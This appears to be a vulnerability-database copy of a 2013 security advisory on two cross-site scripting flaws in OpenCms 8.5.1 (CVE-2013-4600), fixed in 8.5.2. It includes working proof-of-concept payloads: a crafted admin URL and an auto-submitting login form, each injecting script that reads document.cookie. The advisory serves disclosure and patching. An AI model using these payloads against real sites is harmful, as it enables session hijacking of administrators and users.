Lucene search
K

OpenCMS 8.5.1 Cross Site Scripting Vulnerability

🗓️ 19 Jul 2013 00:00:00Reported by High-Tech BridgeType 
zdt
 zdt
🔗 0day.today👁 68 Views

OpenCms 8.5.1 XSS Vulnerability, Fixed by Vendo

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2013-4600
9 Aug 201321:00
cve
Cvelist
CVE-2013-4600
9 Aug 201321:00
cvelist
EUVD
EUVD-2013-4456
7 Oct 202500:30
euvd
Github Security Blog
Alkacon OpenCMS XSS via title and requestedResource parameters
17 May 202205:07
github
htbridge
XSS Vulnerabilities in OpenCms
12 Jun 201300:00
htbridge
NVD
CVE-2013-4600
9 Aug 201321:55
nvd
OSV
GHSA-4GFX-P2J4-W2VH Alkacon OpenCMS XSS via title and requestedResource parameters
17 May 202205:07
osv
Packet Storm
OpenCMS 8.5.1 Cross Site Scripting
18 Jul 201300:00
packetstorm
Prion
Cross site scripting
9 Aug 201321:55
prion
RedhatCVE
CVE-2013-4600
22 May 202511:12
redhatcve
Rows per page
Product: OpenCms
Vendor: Alkacon Software
Vulnerable Version(s): 8.5.1 and probably prior
Tested Version: 8.5.1
Vendor Notification: June 12, 2013 
Vendor Patch: July 10, 2013 
Public Disclosure: July 17, 2013 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2013-4600
Risk Level: Medium 
CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered 2 XSS vulnerabilities in OpenCms, which can be exploited to perform Cross-Site Scripting attacks against users of vulnerable application. 


1) Multiple Cross-Site Scripting (XSS) in OpenCms: CVE-2013-4600

1.1 The vulnerability exists due to insufficient sanitisation of user-supplied data in "title" HTTP GET parameter passed to "/opencms/opencms/system/workplace/views/admin/admin-main.jsp" script. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.

The exploitation example below uses the "alert()" JavaScript function to display administrator's cookies:

http://[host]/opencms/opencms/system/workplace/views/admin/admin-main.jsp?action=&dialogtype=publishproject&framename=body&title=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E


1.2 The vulnerability exists due to insufficient sanitisation of user-supplied data in "requestedResource" HTTP POST parameter passed to "/opencms/opencms/system/login/index.html" URL. A remote attacker can trick a logged-in user to open a specially crafted malicious webpage and execute arbitrary HTML and script code in browser in context of the vulnerable website.

The exploitation example below uses the "alert()" JavaScript function to display user's cookies:


<form action="http://[host]/opencms/opencms/system/login/index.html" method="post" name="main">
<input type="hidden" name="login"  value="true">
<input type="hidden" name="ocPword"  value="1">
<input type="hidden" name="ocUname"  value="1">
<input type="hidden" name="requestedResource"  value='</script><script>alert(document.cookie);</script>'>
<input type="submit" id="btn">
</form>
<script>
document.main.submit();
</script>


-----------------------------------------------------------------------------------------------

Solution:

Upgrade to OpenCms 8.5.2

More Information:
http://www.opencms.org/en/news/130710-opencms-v852-releasenotes.html
https://github.com/alkacon/opencms-core/issues/173

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23160 - https://www.htbridge.com/advisory/HTB23160 - XSS vulnerabilities in OpenCms.
[2] OpenCms - http://www.opencms.org - OpenCms from Alkacon Software is a professional, easy to use website content management system.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

#  0day.today [2018-01-02]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

19 Jul 2013 00:00Current
6.2Medium risk
Vulners AI Score6.2
EPSS0.00256
68